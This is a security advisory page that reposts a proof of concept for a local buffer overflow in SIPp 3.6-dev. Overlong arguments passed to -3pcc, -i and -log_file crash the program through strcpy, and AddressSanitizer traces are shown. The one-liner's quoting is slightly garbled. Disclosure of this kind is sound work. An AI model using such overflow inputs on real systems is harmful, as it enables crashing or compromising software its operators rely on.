SIPp 3.6 Buffer Overflow

2018.07.02
Credit: Fakhri Zulkifli
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

# Exploit Title: SIPp 3.6 - Local Buffer Overflow (PoC) # Date: 2018-06-30 # Exploit Author: Fakhri Zulkifli # Vendor Homepage: http://sipp.sourceforge.net/ # Software Link: https://github.com/SIPp/sipp/releases # Version: 3.6-dev and earlier # Tested on: 3.6-dev $ ./sipp -3pcc `python -c aprint aAa * 300'` #0 0x448364 in strcpy /home/user/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425 #1 0x668d06 in main /home/user/sipp/src/sipp.cpp:1531:17 #2 0x7ff5ec21282f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291 #3 0x41f1a8 in _start (/home/user/sipp/sipp+0x41f1a8) $ ./sipp -i `python -c aprint aAa * 300'` #0 0x448364 in strcpy /home/user/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425 #1 0x66a303 in main /home/user/sipp/src/sipp.cpp:1477:17 #2 0x7f281302682f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291 #3 0x41f1a8 in _start (/home/user/sipp/sipp+0x41f1a8) $ ./sipp -log_file `python -c aprint aAa * 300'` #0 0x448364 in strcpy /home/user/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425 #1 0x66912f in main /home/user/sipp/src/sipp.cpp:1706:17 #2 0x7f6ca663782f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291 #3 0x41f1a8 in _start (/home/user/sipp/sipp+0x41f1a8)


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top